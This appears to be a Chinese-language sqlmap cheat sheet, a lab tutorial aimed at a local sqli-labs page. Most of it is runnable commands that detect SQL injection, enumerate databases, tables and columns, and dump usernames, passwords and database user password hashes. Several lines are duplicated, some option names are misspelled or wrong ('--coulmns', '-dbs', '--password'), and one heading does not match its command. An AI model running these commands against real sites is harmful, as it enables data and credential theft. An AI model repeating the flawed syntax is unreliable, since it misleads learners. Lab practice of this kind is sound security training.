sqlmap基础语法
- 判断是否存在注入点
- # sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1"
- 会提示是否有注入点和注入的方式
- 判断文本中是否存在注入点
- 使用 burp suite 抓取 HTTP头部信息1
- 创建文本 1.txt 将头部内容 书写到 1.txt
- sqlmap -r 1.txt --batch
- --batch 为自动命令,免除手动改确认信息
- 提示注入点以及注入类型
- 使用 burp suite 抓取 HTTP头部信息1
- 获取当前数据库名称
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -dbs --batch
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -dbs --batch
- 获取数据库的表名称
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -tables --batch
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -tables --batch
- 获取数据库的列名称
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -T 'users' --coulmns --batch
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -T 'users' --coulmns --batch
- 获取数据
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -T 'users' -C 'password , username' --batch --dump
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -T 'users' -C 'password , username' --batch --dump
- 查看数据库的管理者(需要拥有权限)
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --users --batch
- 查看数据库用户的密码
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --password --batch
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --password --batch
- 查看当前数据库的名称
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --password
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --password
- 查看当前数据库的用户
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --current-user --batch
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --current-user --batch
sqlmap的一些参数
- --level 5 探测等级,等级越高探测的广度越大 耗时越长
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --level 5 --batch
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --level 5 --batch
- is-dba 判断当前用户是否为管理员用户
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --is-dba --batch
- false 不是管理员用户 true 为管理员用户
- sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --is-dba --batch